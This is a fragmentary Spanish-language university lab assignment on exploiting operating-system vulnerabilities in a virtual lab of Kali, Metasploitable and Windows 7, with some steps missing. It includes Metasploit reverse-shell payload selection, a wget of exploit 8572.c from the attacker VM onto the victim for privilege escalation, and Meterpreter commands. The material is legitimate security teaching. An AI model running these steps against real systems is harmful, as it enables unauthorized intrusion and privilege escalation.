Documentos de Académico
Documentos de Profesional
Documentos de Cultura
GESTIÓN DE
CSY Nombre de la
Sigla Asignatura RIESGO EN REDES Tiempo 3 horas
6122 Asignatura
CORPORATIVAS
Experiencia de Aprendizaje N° 3 Evaluación de controles de Seguridad
Actividad N° 3.3 Explotación de vulnerabilidades en Sistemas Operativos
1. Esta evaluación tiene carácter formativo, es decir: busca evaluar lo aprendido hasta el momento en
la asignatura.
2. Esta evaluación será en formato grupal.
3. La evaluación podrá realizarse en horario de clases, como un encargo con plazo de entrega.
Contexto de la Evaluación:
Instrucciones de la Evaluación:
Debe revisar la guía adjunta y seguir los pasos propuestos con la ayuda de su profesor
1.- Levante la máquina virtual Kali Linux con la interfaz de red en modo Red NAT
2.- Instale la máquina virtual Metasploitable con la interfaz de red en modo Red NAT
# msfconsole
# nmap direccion_ip
5.- Confirme que tiene un servicio activo en el puerto 445 y realice un footprinting con el siguiente comando:
7.- Encuentre una vulnerabilidad que contenga un exploit para el servicio descubierto
12.- Seleccione el payload con el comando set payload cmd/unix/reverse y revise los parámetros de
configuración con el comando:
15.- Valide a través de algún comando Linux que está conectado a la interfaz de comando del servidor sin
autenticación.
2.- Ejecute la aplicación msfconsole en su máquina Kali y busque un exploit asociado al servicio mencionado.
2.- Busque en el sitio CVE una vulnerabilidad de este servicio que permita realizar el escalamiento de
privilegios.
4.- Busque el exploit asociado en el sitio www.exploit-db.com y bájelo a su disco local en Kali
5.- Cree un directorio en el home del servidor web y copie el exploit a dicho directorio
wget http://ip_kali/share/8572.c
# msfconsole
4.- Levante la máquina Windows 7 con la interfaz de red en modo Red NAT y visualice su dirección IP
13.- Inicie el browser en la maquina victima Windows 7 y ejecute el siguiente comando en la consola de
Meterpreter
meterpreter > ps
16.- Desde la máquina Windows 7, conéctese al sitio Altoro Mutual y realice el login del usuario